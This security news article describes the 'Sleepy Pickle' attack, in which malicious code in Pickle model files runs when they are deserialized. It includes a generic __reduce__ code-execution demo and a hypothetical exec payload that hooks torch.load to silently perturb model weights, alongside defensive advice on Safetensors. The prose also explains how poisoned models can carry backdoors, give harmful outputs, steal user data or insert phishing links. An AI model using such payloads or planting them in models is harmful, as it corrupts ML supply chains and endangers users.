Sleepy Pickle Exploit Subtly Poisons ML Models

Published: 23/11/2024   Category: security




A model can be perfectly innocent, yet still dangerous if the means by which it's packed and unpacked are tainted.



Researchers have concocted a new way of manipulating machine learning (ML) models by injecting malicious code into the serialization process. The method focuses on the pickling process used to store Python objects in bytecode. ML models are often packaged and distributed in Pickle format, despite its longstanding, known risks.
As described in a new blog post from Trail of Bits, Pickle files give attackers cover to inject malicious bytecode into ML programs. In theory, such code could cause any number of consequences, from manipulated output to data theft, but it wouldn't be as easily detected as other methods of supply chain attack.
"It allows us to more subtly embed malicious behavior into our applications at runtime, which allows us to potentially go much longer periods of time without it being noticed by our incident response team," warns David Brauchler, principal security consultant with NCC Group.
A so-called Sleepy Pickle attack is performed rather simply with a tool like Fickling, an open source program for detecting, analyzing, reverse engineering, or creating malicious Pickle files. An attacker merely has to convince a target to download a poisoned .pkl file, say via phishing or supply chain compromise, and then, upon deserialization, the malicious operation code executes as a Python payload.
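To illustrate the underlying mechanism in general terms (this is a standard demonstration of Pickle's behavior, not code from the Trail of Bits research), any object whose __reduce__ method hands Pickle a callable and its arguments will have that callable invoked the moment the data is unpickled:

```python
import os
import pickle

# Generic illustration of why unpickling untrusted data is dangerous:
# __reduce__ tells pickle to "reconstruct" this object by calling os.system
# with the given argument, so the command runs during pickle.loads().
class PoisonedObject:
    def __reduce__(self):
        return (os.system, ("echo 'code ran at deserialization time'",))

poisoned = pickle.dumps(PoisonedObject())

# The victim only has to load the data; no call into the "model" is needed.
pickle.loads(poisoned)
```

The damage is done entirely by the deserializer doing its job, which is why simply loading an untrusted .pkl file is equivalent to running untrusted code.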
Poisoning a model in this way carries a number of stealth advantages. For one thing, it doesn't require local or remote access to a target's system, and no trace of malware is left on disk. Because the poisoning occurs dynamically during deserialization, it resists static analysis. (A malicious model published to an AI repository like Hugging Face might be much more easily sniffed out.)
Serialized model files are hefty, so the malicious code necessary to cause damage might represent only a small fraction of the total file size. And these attacks can be customized in the same ways regular malware attacks are, to hinder detection and analysis.
While Sleepy Pickle can presumably be used to do any number of things to a target's machine, the researchers noted, controls like "sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user's system or stealing/tampering with the user's data."
More interestingly, attacks can be oriented toward manipulating the model itself. For example, an attacker could insert a backdoor into the model, or manipulate its weights and, thereby, its outputs. Trail of Bits demonstrated in practice how this method can be used to, for example, suggest that users with the flu drink bleach to cure themselves. Alternatively, an infected model can be used to steal sensitive user data, add phishing links or malware to model outputs, and more.
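The sketch below is hypothetical and is not the specific payload Trail of Bits demonstrated; it assumes a PyTorch-based pipeline purely for illustration. It shows how a pickled object can use exec to run code at deserialization time that quietly perturbs whatever weights the process loads next, without modifying any file on disk:

```python
import pickle

# Hypothetical sketch: source code that, once executed in the victim's
# process, wraps torch.load so any weights loaded afterwards are subtly
# perturbed in memory. Files on disk are never modified, which is what
# makes this style of tampering hard to spot.
PAYLOAD_SOURCE = """
import torch
if not hasattr(torch, "_original_load"):
    torch._original_load = torch.load

    def _tampered_load(*args, **kwargs):
        import torch
        obj = torch._original_load(*args, **kwargs)
        if isinstance(obj, dict):  # e.g. a state_dict of weights
            for tensor in obj.values():
                if torch.is_tensor(tensor) and tensor.is_floating_point():
                    tensor.add_(0.01 * torch.randn_like(tensor))  # quiet drift
                    break
        return obj

    torch.load = _tampered_load
"""

class SleepyPayload:
    def __reduce__(self):
        # exec is pickled as a reference to builtins.exec, so PAYLOAD_SOURCE
        # runs in the victim's interpreter the moment this object is unpickled.
        return (exec, (PAYLOAD_SOURCE,))

poisoned_bytes = pickle.dumps(SleepyPayload())  # what an attacker would ship
```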
To avoid this kind of risk, organizations can focus on using ML models only in the safer file format, Safetensors. Unlike Pickle, Safetensors handles only tensor data, not arbitrary Python objects, removing the risk of arbitrary code execution during deserialization.
"If your organization is dead set on running models that are out there that have been distributed as a pickled version, one thing that you could do is upload it into a resource-safe sandbox, say AWS Lambda, and do a conversion on the fly, and have that produce a Safetensors version of the file on your behalf," Brauchler suggests.
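A minimal sketch of the conversion Brauchler describes, assuming the pickled file holds an ordinary PyTorch state_dict (file names here are placeholders); the torch.load call is the dangerous step, which is exactly why he suggests running it in a disposable sandbox:

```python
import torch
from safetensors.torch import save_file

# Unsafe step: loading a Pickle-based checkpoint can execute arbitrary code,
# so run this inside an isolated, disposable environment with no secrets and
# restricted egress. On recent PyTorch versions you may need to pass
# weights_only=False here, which is precisely the risky code path.
state_dict = torch.load("model.pkl", map_location="cpu")

# Safetensors stores raw tensor data only, so keep just the tensors and make
# them contiguous before writing the safer artifact.
tensors = {name: t.contiguous() for name, t in state_dict.items() if torch.is_tensor(t)}
save_file(tensors, "model.safetensors")
```

Downstream services then load only the .safetensors artifact; the original Pickle file never leaves the sandbox.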
"But I think that's more of a Band-Aid on top of a larger problem," he adds. "Sure, if you go and download a Safetensors file, you might have some amount of confidence that it doesn't contain malicious code. But do you trust that the individual or organization that produced this data generated a machine learning model that doesn't contain things like backdoors or malicious behavior, or any other number of issues, oversights, or malice, that your organization isn't prepared to handle?"
"I think that we really need to be paying attention to how we're managing trust within our systems," he says, and the best way of doing that is to strictly separate the data a model is retrieving from the code it uses to function. "We need to be architecting around these models such that even if they do misbehave, the users of our application and our assets within our environments are not impacted."
